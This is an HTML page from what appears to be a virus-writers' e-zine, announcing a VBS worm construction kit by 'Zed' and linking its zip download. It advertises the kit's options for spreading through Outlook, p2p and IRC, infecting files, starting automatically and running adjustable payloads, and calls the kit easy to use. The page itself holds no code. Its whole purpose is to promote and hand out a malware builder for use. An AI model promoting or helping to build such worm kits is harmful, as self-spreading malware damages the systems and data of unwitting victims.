<html>
<head>
<title>rRlf #3</title>
</head>
<body text="#ffffff" link="#ff0000" vlink="#ff0000" alink="#ff0000" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>The Revoluti0n</i>
<br><table cellpadding="9">
<tr>
<th><a href="08.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="10.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>Windows Scripting Host Worm Constructor 1.0 by Zed</u></b>
<p>A vbs-worm construction kit, with a lot of adjustable options,
<br>like spreading options (Outlook, p2p, irc), file infection, worm backup options,
<br>autostart options, lots of different adjustable payloads, and some more things.
<br>Check out yourself, easy to use.
<p><a href="09.zip">zipped kit</a>
</body>
</html>
